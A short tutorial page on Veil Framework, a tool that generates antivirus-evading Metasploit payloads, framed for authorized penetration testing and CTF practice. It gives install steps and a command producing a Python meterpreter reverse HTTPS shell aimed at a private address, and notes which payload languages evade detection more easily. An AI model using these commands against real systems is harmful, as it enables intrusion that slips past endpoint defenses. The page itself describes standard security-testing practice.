What is Veil Framework?
Veil Framework is a tool designed to generate Metasploit payloads that bypass common antivirus solutions. Used in the Exploitation phase of authorized penetration testing, it supports multiple payload languages including Python, PowerShell, Ruby, and Go — making it useful for testing endpoint detection capabilities.
⚠ Legal Notice
Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
# Update packages sudo apt update # Install (if not already on Kali) sudo apt install veil -y # Run the setup script on first use /usr/share/veil/config/setup.sh --force --silent # Launch Veil veil
Basic Usage
# Launch the interactive menu veil # List all available tools veil --list-tools # Use Evasion tool directly (most common) veil -t Evasion # List all Evasion payloads veil -t Evasion --list-payloads # Generate a specific payload (e.g. Python reverse HTTPS shell) veil -t Evasion -p python/meterpreter/rev_https \ --ip 192.168.1.10 --port 4444 -o my_payload
Common Payload Languages
python/— Python-based payloads, widely supportedpowershell/— PowerShell payloads for Windows targetsgo/— Go-compiled payloads, harder to detectruby/— Ruby-based shellcode injectorscs/— C# payloads for .NET environments
Common Use Cases
- Authorized penetration testing engagements
- CTF (Capture The Flag) competitions
- Internal security audits
- Bug bounty program research
Further Reading
Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs. Always read the official documentation before using in a live engagement.